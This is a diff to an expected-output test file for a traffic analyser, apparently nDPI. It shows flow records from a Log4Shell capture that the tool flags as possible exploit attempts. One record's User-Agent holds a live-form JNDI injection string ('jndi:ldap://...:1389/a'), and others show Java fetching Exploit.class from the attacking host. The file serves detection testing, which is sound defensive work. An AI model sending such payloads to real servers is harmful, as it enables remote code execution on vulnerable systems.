diff options
Diffstat (limited to 'tests/cfgs/default/result/log4j-webapp-exploit.pcap.out')
| -rw-r--r-- | tests/cfgs/default/result/log4j-webapp-exploit.pcap.out | 5 |
1 files changed, 5 insertions, 0 deletions
diff --git a/tests/cfgs/default/result/log4j-webapp-exploit.pcap.out b/tests/cfgs/default/result/log4j-webapp-exploit.pcap.out index 6fb044ab5..48404b0fe 100644 --- a/tests/cfgs/default/result/log4j-webapp-exploit.pcap.out +++ b/tests/cfgs/default/result/log4j-webapp-exploit.pcap.out @@ -28,6 +28,11 @@ LDAP 32 2796 2 Acceptable 66 9537 5 Unrated 356 25081 2 +Unspecified 356 25081 2 +Web 9 1497 1 +Download 25 5244 2 +System 32 2796 2 + 1 TCP 172.16.238.10:48534 <-> 172.16.238.11:80 [proto: 7/HTTP][IP: 0/Unknown][ClearText][Confidence: DPI][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 6][cat: Download/7][7 pkts/692 bytes <-> 6 pkts/1964 bytes][Goodput ratio: 30/79][0.00 sec][Hostname/SNI: 172.16.238.11][bytes ratio: -0.479 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 0/0 1/1 0/0][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 99/327 276/1420 72/494][URL: 172.16.238.11/Exploit.class][StatusCode: 200][Content-Type: application/java-vm][Server: SimpleHTTP/0.6 Python/3.4.2][User-Agent: Java/1.8.0_51][Risk: ** Binary App Transfer **** HTTP/TLS/QUIC Numeric Hostname/SNI **** Possible Exploit Attempt **][Risk Score: 310][Risk Info: Suspicious Log4J / Found host 172.16.238.11 / Found mime exe java-vm][TCP Fingerprint: 2_64_29200_2e3cee914fc1/Linux][PLAIN TEXT (GET /Exploit.class HTTP/1.1)][Plen Bins: 0,0,0,0,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,33,0,0,0,0,0] 2 TCP 172.16.238.10:48444 <-> 172.16.238.11:80 [proto: 7/HTTP][IP: 0/Unknown][ClearText][Confidence: DPI][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 6][cat: Download/7][6 pkts/624 bytes <-> 6 pkts/1964 bytes][Goodput ratio: 33/79][0.01 sec][Hostname/SNI: 172.16.238.11][bytes ratio: -0.518 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 1/2 3/3 1/1][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 104/327 276/1420 77/494][URL: 172.16.238.11/Exploit.class][StatusCode: 200][Content-Type: application/java-vm][Server: SimpleHTTP/0.6 Python/3.4.2][User-Agent: Java/1.8.0_51][Risk: ** Binary App Transfer **** HTTP/TLS/QUIC Numeric Hostname/SNI **** Possible Exploit Attempt **][Risk Score: 310][Risk Info: Suspicious Log4J / Found host 172.16.238.11 / Found mime exe java-vm][TCP Fingerprint: 2_64_29200_2e3cee914fc1/Linux][PLAIN TEXT (GGET /Exploit.class HTTP/1.1)][Plen Bins: 0,0,0,0,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,33,0,0,0,0,0] 3 TCP 172.16.238.1:1984 <-> 172.16.238.10:8080 [proto: 7/HTTP][IP: 0/Unknown][ClearText][Confidence: DPI][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 8][cat: Web/5][5 pkts/994 bytes <-> 4 pkts/503 bytes][Goodput ratio: 65/44][19.29 sec][Hostname/SNI: 192.168.13.31][bytes ratio: 0.328 (Upload)][IAT c2s/s2c min/avg/max/stddev: 1/7 4822/6428 10256/10256 4838/4568][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 199/126 714/291 258/95][URL: 192.168.13.31:8080/log4shell/login][StatusCode: 200][Req Content-Type: application/x-www-form-urlencoded][Content-Type: text/html][User-Agent: jndi:ldap://172.16.238.11:1389/a][Risk: ** Known Proto on Non Std Port **** HTTP/TLS/QUIC Numeric Hostname/SNI **** HTTP Susp Header **** Possible Exploit Attempt **][Risk Score: 310][Risk Info: Suspicious Log4J / Expected 172.16.238.10, found 192.168.13.31 / Found host 192.168.13.31 / Expected on port 80][TCP Fingerprint: 2_64_64240_2e3cee914fc1/Linux][PLAIN TEXT (POST /log)][Plen Bins: 0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0] |